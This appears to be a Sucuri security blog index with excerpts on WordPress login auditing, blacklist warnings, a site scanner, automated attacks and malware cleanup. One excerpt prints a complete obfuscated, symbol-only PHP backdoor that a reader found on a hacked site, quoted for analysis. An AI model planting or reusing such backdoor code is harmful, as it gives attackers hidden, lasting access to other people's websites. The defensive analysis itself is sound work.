Ask Sucuri: Who is logging into my WordPress site?

Today, we’re going to revisit our Q&A series. If you have any questions about malware, blacklisting, or security in general, send them to us at: info@sucuri.net. For all the “Ask Sucuri” answers, go here.


Question: How do I know who is logging into my WordPress site?

Answer: One of the most basic and important security aspects of any system is access control, specifically logging your access control point. It defines who can do what and where and under what circumstances. However, access control without the proper enforcement and auditing is like a law that is not enforced by the police; it loses its meaning.

WordPress has a very powerful access control tool, known as roles and capabilities, that allows you to specify what each user can do. However, it lacks good auditing capabilities. The purpose of auditing, i.e. logging, is to give administrators visibility into what is happening on the website at any given time.

Auditing is a very broad term. We could go in depth into the various elements that you, as an administrator, should audit. However, for this post we’re going to focus on your access control, specifically who is logging in.

Sucuri WordPress Security Plugin – Last Logins Feature

Out-of-the-box, the WordPress CMS does not provide auditing, nor does it include any type of authentication auditing for successful logins. For this reason, we have added both capabilities to our Free WordPress Security plugin.

The plugin allows administrators to see who is and has logged into your website. It includes attributes like location (i.e. where) and time. It’s known as the Last Logins feature (it’s based off the Linux “last” command).

This is what it looks like in your dashboard:

wordpress-lastlogins

It will list the users, IP addresses (hidden in the image) and the time of the login.

If you want to know who is logging in to your site (from when and from where), then leverage our Free WordPress Security plugin.

Note that it will only start logging the users, after you install it. So as soon you add the plugin, the last-logins table will be empty. But if you try to logout/log back in to WordPress, you should start to see it populating.

Importance of Auditing Your Access Control

For website administrators, we cannot stress the importance of logging activity, such as user log ins, enough. We handle various incidents on a daily basis where the website owner has no idea as to who is and isn’t logging into their environment.

Often, after a compromise, the forensics team will work with the website owner to understand what was going on. In many instances, basic auditing would have informed the client that something was not right. Here are some examples:

  1. Website owner works on the Pacific Coast, yet his user is logging in from China with his username and password
  2. Website owner is sleeping, yet somehow, the client’s user is still logging in
  3. A new user is logging into the environment every day and the website owner never created the user or it’s a single user website

Are you able to say, confidently, that this is not happening to you? If the answer is, “Yes,” then congratulations, you’re adhering to the auditing basics. If the answer is, “No,” then you should seriously consider downloading our free plugin.

Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:

Read More

Ask Sucuri: Non-alphanumeric Backdoors

If you have any questions about malware, blacklisting, or security in general, send them to contact@sucuri.net and we will write a post about it and share. For all the “Ask Sucuri” answers, go here.


Question: My site got hacked and I am seeing this backdoor with no alpha numeric characters. What is it doing?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__< <$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Answer: Backdoors are tools used by attackers to help them maintain access to the sites they compromise. The harder it is to find the backdoor, the better for the attackers, since it will likely remain undetected allowing them to reinfect or regain access to the site whenever they want.

This backdoor is a very good example of a sneaky one. No alpha numeric characters, no direct function calls or anything like that. So what is it doing? We asked one of our developers, Yorman Arias, to help decode it.


Read More

Ask Sucuri: How does SiteCheck work?

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.

Read More

Automation is Key With Today’s Website Attacks

When trying to undertand the anatomy of attacks on websites you have to break it down into manageable parts. In my mind it really comes down to two types: Targeted and Opportunistic.

More important to understand is how the attack is executed, and that’s what I want to spend some time on in this post.

What do today’s attacks look like?


For most, targeted attacks will be rare, but they do happen every day. You might recall mentions on the news about the CIA website being defaced, or LinkedIn and eHarmony being compromised, in both those instances, I’d categorize those as targeted attacks. There are also examples like the most recent article that talked to the Gizmodo employee who appeared to have lost his entire digital identify, simply because the attacker liked his Twitter handle.

On the flip side, you have opportunistic attacks that are likely what most reading this get affected by. I provide a better discussion on it on our post, Understanding Opportunistic Attacks. The good news though is that in both instances you find many similarities in the attacks, specifically the use of tools that allow for automation.

Read More

Secure Website Development – Importance of Developing Securely

We clean hundreds of sites every day and often their problems are associated with the same issues: outdated and sometimes unnecessary software, weak passwords and so on. But sometimes the issue is not as superficial, sometimes it goes a bit deeper than that. You know your server is updated, your CMS is also (ie., WordPress, Joomla, Drupal), yet you still get infected! How is that possible?!

That’s the question we hope to address in a series of posts related to developing with security in mind. This unfortunately is not something tailored for end-users, unless as an end-user you’re responsible for the development of your website. It is however good for end-users to read as it’ll help better understand other possible vectors affecting their infection or reinfection scenarios.

Read More

Pharma Hack Backdoor Analyzed – PHP5.PHP

Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded, today I will spend some time looking a different variant of the same infection type but focus on a payload that is not encoded or embedded within an existing file, instead it resides in its own file – PHP5.php.

“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”

If you have ever come across this file and find yourself thinking this, we highly encourage you not to and take a minute to see if any of its components resemble what we’re about to share.

Dissecting the Payload


Read More

ASK Sucuri: What should I do if my email is in the Yahoo Leak?

We love to get questions from you, our readers, in our Ask Sucuri series. If you have any questions about website malware, blacklisting, or security in general, send us an email to: info@sucuri.net or hit us on Twitter – @sucuri_security.


Yesterday we released a blog post about the Yahoo Leak, and created an online tool to check if your email was exposed in the leak. Since then, we have received hundreds of emails asking what should be done for anyone whose account was compromised.

Read More

Ask Sucuri: What should I know when engaging a Web Malware Company?

We work in a business in which it is always chaos. In most situations the client is often distraught, vulnerable, and is plagued with this feeling of being out of control. It is the business of web malware cleanup. The last thing any website owner wants is to delay the cleanup process because of silly things that could have been easily prevented.

In our mind, there are three things you must know before engaging with any web malware company:

  • Know Your Host
  • Know How to Access Your Server
  • Have a Backup

As simple as they may appear, they still remain allusive to many.
Read More

Ask Sucuri: How to Stop The Hacker and ensure Your Site is Locked!!

With the rise in web malware over the last 6 – 12 months, it’s important that we take some time to continue to educate and offer insight into ways that can help you stay ahead, in the hopes of stopping the hacker.

Understanding The Hacker

Before we get started, lets take a look at the name “Hacker.” What many folks don’t realize is that while “Hacker” is often associated with bad, it also has a good association.

To the popular press, “hacker” means someone who breaks into computers. Among programmers it means a good programmer. But the two meanings are connected. To programmers, “hacker” connotes mastery in the most literal sense: someone who can make a computer do what he wants—whether the computer wants to or not. – source: Paul Graham


Read More